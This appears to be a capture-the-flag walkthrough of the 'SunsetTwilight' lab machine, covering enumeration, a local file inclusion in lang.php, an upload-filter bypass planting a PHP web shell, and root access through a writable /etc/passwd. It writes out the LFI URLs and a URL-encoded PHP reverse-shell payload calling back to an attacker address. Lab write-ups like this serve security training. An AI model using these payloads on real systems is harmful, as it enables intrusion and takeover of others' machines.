SunsetTwilight

Target IP: 192.168.186.91


Scanning

efa4a288db11d56dfc71e57f8ee12646.png
Port 25: SMTP
a531246969705c8b25c8f4ffdf120521.png
Port 80: HTTP
f92893bb784e8ee6254c3ee9b3038ecd.png
Ports 139 and 445: SMB
367425964f8096b2c36172799ab07c76.png
Port 2121: FTP
7f1504e7c187d5cb3fe5a4fe2cb8c8be.png
Port 3306: MySQL
29336d6234aadf7f9ff4759eb46dfc2d.png
Ports 8080 and 63525: HTTP
6108b62ba75cb00b8caed980c4d1ced0.png

There are many ports open on the target machine. I will start enumeration with SMB as it allows guest access. FTP also allows anonymous login too.


Enumeration

Ports 139 and 445: SMB
7c0d6638d83c969617fe79a055e53a74.png
There is a share called WRKSHARE. I only have read access to it. I found a user called miguel. I also obtained the local.txt flag file using this access.

Port 2121: FTP
da2034a3333520a7e108c500148d0a8a.png
9618f121a817b64dbbf95e83a528e1ab.png
There is an interesting file called 22253251-65325.twilight when I use anonymous login to access FTP. This file contains the message shown above.

Port 80: HTTP
/Gallery
6d9afe3edd7ca0a1c21d6c4c31152b11.png
Performing a directory search using the command gobuster dir -u http://192.168.186.91 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt output the result above.

9627c10f7b5d77a6633def3071432e1c.png
ec3706abfd001d8030f41af09929a75b.png
There is an interesting directory called /gallery/. Looks like I can only upload jpeg files. After uploading a test jpeg file. I wonder where our images get stored on the target machine.

f8a2baa1997217a4118ec0ab89f35d04.png
Using the WRKSHARE SMB share, I located where the images get stored on the server. When an image gets uploaded, it gets saved to three directories: original, thumbnail, and normal. So it is possible to access the uploaded images by http://192.168.186.91/gallery/<directory_name>/<image_name>. For example, I accessed my test image above my browsing to http://192.168.186.91/gallery/original/image.jpeg.

/lang.php
7dca4f7390d7acdc6a8a21ccb00c7b1c.png
The webpage above is displayed for this HTTP application. It looks like I can change the language of the page by pressing the button.
fa912b31e98ba15c4cc024b53b5ab989.png
An interesting parameter called lang got appened at the end of the URL. Since it is trying to include the page -- could this host be vulnerable to LFI?

2fd86dce6975241afda45730690fa2b7.png
And bingo. The target host is vulnerable to LFI as I was able to access /etc/passwd file. Trying to access the SSH key of miguel did not work.

80c58373ad0288777f6fc24865755150.png
And it is possible to obtain the images from the different directories located in /gallery/ application; for example, by browsing to http://192.168.186.91/lang.php?lang=../../../../../../var/www/html/gallery/original/image.jpeg. I should be able to place a simple-web shell inside a JPEG image using this technique, and escalate it to a reverse shell connection.


Exploitation

e8f326033e2b83343c01b0e39689acc0.png
I created a copy of the same test image above. I intercepted the POST request of file upload using BurpSuite and made changes to the highlighted items above. Looks like the server only checks if the filename contains .jpeg, meaning it is possible to bypass this by appending the extension with a .php, so it will be evil.jpeg.php. I removed the image content and replaced it with a simple PHP one-line command for the web-shell.

2270016a7fa9a1d17845474906034c13.png
And this uploaded successfully.

48e1c04155fd087bc28bc99624858c64.png
I can now access my web-shell by browsing to http://192.168.186.91/lang.php?lang=../../../../../../var/www/html/gallery/original/evil.jpeg.php. In the image above, I sent the payload whoami;ls and obtained the results. Time to upgrade this simple shell to a reverse shell connection. Since the host is running PHP, I will use a PHP payload.

c20405156b11c9df66cb9ec806d4d875.png
Now I have a foothold on the machine using file upload vulnerability. I used the payload mentioned below.
Payload used: php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.45.195%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
URL with payload: 192.168.186.91/lang.php?lang=../../../../../../var/www/html/gallery/original/evil.jpeg.php&cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.45.195%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27


Privilege Escalation

3e4711e836599a6d30c634c5fb556fc1.png
WTF. Looks like I can make changes to the /etc/passwd file and create a new user with root privileges.

b6d5be0e2ade35a7a27948c7ad027a30.png
I created a new user called super with the password rooted. Now I have root access with this new user.


Flags

5c01f32581f46e6b4aff6e06fdc34587.png
The proof.txt and local.txt flags. The local.txt flag can be obtained using the SMB WRKSHARE without exploiting the machine. I obtained the proof.txt flag due to the weak file permission set on /etc/passwd file.